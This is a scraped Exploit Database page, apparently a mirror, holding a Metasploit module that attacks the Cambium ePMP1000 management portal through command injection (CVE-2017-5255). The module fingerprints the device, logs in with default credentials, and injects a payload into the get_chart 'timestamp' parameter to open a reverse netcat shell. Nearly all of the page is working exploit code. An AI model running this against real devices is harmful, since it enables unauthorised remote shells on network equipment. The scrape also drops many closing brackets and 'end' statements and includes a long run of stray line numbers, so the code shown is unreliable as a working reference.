Cambium ePMP1000 – ‘get_chart’ Shell via Command Injection (Metasploit)

Exploit Database
109 阅读

作者： Metasploit

日期： 2018-01-01
类别：
- remote
平台：
- cgi
来源：https://www.exploit-db.com/exploits/43413/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

193

194

195

196

197

198

199

200

201

202

203

204

205

206

207

208

209

210

211

212

213

214

215

216

217

218

219

220

221

222

223

224

225

226

227

228

229

230

231

232

233

234

235

236

237

238

239

240

241

242

243

244

245

246

247

248

249

250

251

252

253

# This module requires Metasploit: http://metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

class MetasploitModule < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info = {})

super(update_info(info,

'Name' => "Cambium ePMP1000 'get_chart' Shell via Command Injection (v3.1-3.5-RC7)",

'Description' => %{

This module exploits an OS Command Injection vulnerability in Cambium

ePMP1000 device management portal. It requires any one of the following login

credentials - admin/admin, installer/installer, home/home - to set up a reverse

netcat shell. The module has been tested on versions 3.1-3.5-RC7.

'License' => MSF_LICENSE,

'Author' =>

[

'Karn Ganeshen <KarnGaneshen[at]gmail.com>'

'References' =>

[

['CVE', '2017-5255'],

['URL', 'https://blog.rapid7.com/2017/12/19/r7-2017-25-cambium-epmp-and-cnpilot-multiple-vulnerabilities']

'Privileged' => true,

'Targets' =>

[

['CMD',

{

'Arch' => ARCH_CMD,

'Platform' => 'unix'

}

]

'DisclosureDate' => 'Dec 18 2017',

'DefaultTarget'=> 0,

'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_netcat' })

)

register_options(

[

Opt::RPORT(80), # Application may run on a different port too. Change port accordingly.

OptString.new('USERNAME', [true, 'A specific username to authenticate as', 'installer']),

OptString.new('PASSWORD', [true, 'A specific password to authenticate with', 'installer'])

], self.class

)

deregister_options('DB_ALL_CREDS', 'DB_ALL_PASS', 'DB_ALL_USERS', 'USER_AS_PASS', 'USERPASS_FILE', 'USER_FILE', 'PASS_FILE', 'BLANK_PASSWORDS', 'BRUTEFORCE_SPEED', 'STOP_ON_SUCCESS')

end

# Fingerprinting

def is_app_epmp1000?

begin

res = send_request_cgi(

{

'uri' => '/',

'method'=> 'GET'

}

)

rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError

print_error("#{rhost}:#{rport} - HTTP Connection Failed...")

return false

end

good_response = (

res &&

res.code == 200 &&

(res.body.include?('cambium.min.css') || res.body.include?('cambiumnetworks.com') && res.body.include?('https://support.cambiumnetworks.com/files/epmp/'))

)

if good_response

get_epmp_ver = res.body.match(/"sw_version">([^<]*)/)

if !get_epmp_ver.nil?

epmp_ver = get_epmp_ver[1]

if !epmp_ver.nil?

print_good("#{rhost}:#{rport} - Running Cambium ePMP 1000 version #{epmp_ver}...")

return true, epmp_ver

else

print_good("#{rhost}:#{rport} - Running Cambium ePMP 1000...")

epmp_ver = ''

return true, epmp_ver

end

else

print_error("#{rhost}:#{rport} - Application does not appear to be Cambium ePMP 1000. The target is not vulnerable.")

epmp_ver = nil

return false

end

# check

def check

success, epmp_ver = is_app_epmp1000?

if (success != 'false' && !epmp_ver.nil? && epmp_ver >= '3.1')

return CheckCode::Vulnerable

else

return CheckCode::Safe # Using 'Safe' here to imply this ver is not exploitable using the module'

end

# Login

def login(user, pass)

res = send_request_cgi(

{

'uri' => '/cgi-bin/luci',

'method' => 'POST',

'headers' => {

'X-Requested-With' => 'XMLHttpRequest',

'Accept' => 'application/json, text/javascript, */*; q=0.01'

'vars_post' =>

{

'username' => 'dashboard',

'password' => ''

}

)

cookies = res.get_cookies_parsed

check_sysauth = cookies.values.select { |v| v.to_s =~ /sysauth_/ }.first.to_s

good_response = (

res &&

res.code == 200 &&

check_sysauth.include?('sysauth')

)

if good_response

sysauth_dirty = cookies.values.select { |v| v.to_s =~ /sysauth_/ }.first.to_s

sysauth_value = sysauth_dirty.match(/((.*)[$ ])/)

prevsessid = res.body.match(/((?:[a-z][a-z]*[0-9]+[a-z0-9]*))/)

res = send_request_cgi(

{

'uri' => '/cgi-bin/luci',

'method' => 'POST',

'cookie' => sysauth_value,

'headers' => {

'X-Requested-With' => 'XMLHttpRequest',

'Accept' => 'application/json, text/javascript, */*; q=0.01',

'Connection' => 'close'

'vars_post' =>

{

'username' => user,

'password' => pass,

'prevsess' => prevsessid

}

)

good_response = (

res &&

res.code == 200 &&

!res.body.include?('auth_failed')

)

if good_response

print_good("SUCCESSFUL LOGIN - #{rhost}:#{rport} - #{user.inspect}:#{pass.inspect}")

# check if max_user_number_reached?

if !res.body.include?('max_user_number_reached')

# get the cookie now

cookies = res.get_cookies_parsed

stok_value_dirty = res.body.match(/"stok": "(.*?)"/)

stok_value = "#{stok_value_dirty}".split('"')[3]

sysauth_dirty = cookies.values.select { |v| v.to_s =~ /sysauth_/ }.first.to_s

sysauth_value = sysauth_dirty.match(/((.*)[$ ])/)

final_cookie = "#{sysauth_value}" + 'usernameType_80=admin; stok_80=' + "#{stok_value}"

# create config_uri

config_uri_get_chart = '/cgi-bin/luci/;stok=' + "#{stok_value}" + '/admin/get_chart'

return final_cookie, config_uri_get_chart

else

print_error('The credentials are correct but maximum number of logged-in users reached. Try again later.')

final_cookie = 'skip'

config_uri_dump_config = 'skip'

config_uri_reset_pass = 'skip'

config_uri_get_chart = 'skip'

return final_cookie, config_uri_get_chart

end

else

print_error("FAILED LOGIN - #{rhost}:#{rport} - #{user.inspect}:#{pass.inspect}")

final_cookie = 'skip'

config_uri_get_chart = 'skip'

return final_cookie, config_uri_get_chart

end

# open cmd_shell

def cmd_shell(config_uri, cookie)

command = payload.encoded

inject = '|' + "#{command}"

clean_inject = CGI.unescapeHTML(inject.to_s)

print_status('Sending payload...')

res = send_request_cgi(

{

'method' => 'POST',

'uri' => config_uri,

'cookie' => cookie,

'headers' => {

'Accept' => '*/*',

'Accept-Language' => 'en-US,en;q=0.5',

'Content-Encoding' => 'application/x-www-form-urlencoded; charset=UTF-8',

'X-Requested-With' => 'XMLHttpRequest',

'Connection' => 'close'

'vars_post' =>

{

'measure' => 's', # This parameter can also be used for injection

'timestamp' => clean_inject,

'debug' => 0

}

}, 25

)

handler

end

# exploit

def exploit

_success, epmp_ver = is_app_epmp1000?

if (epmp_ver < '3.1' || epmp_ver > '3.5' && epmp_ver != '3.5-RC7')

print_error('This module is applicable to versions 3.1-3.5-RC7 only. Exiting now.')

return

else

cookie, config_uri_get_chart = login(datastore['USERNAME'], datastore['PASSWORD'])

if cookie == 'skip' && config_uri_get_chart == 'skip'

return

else

cmd_shell(config_uri_get_chart, cookie)

end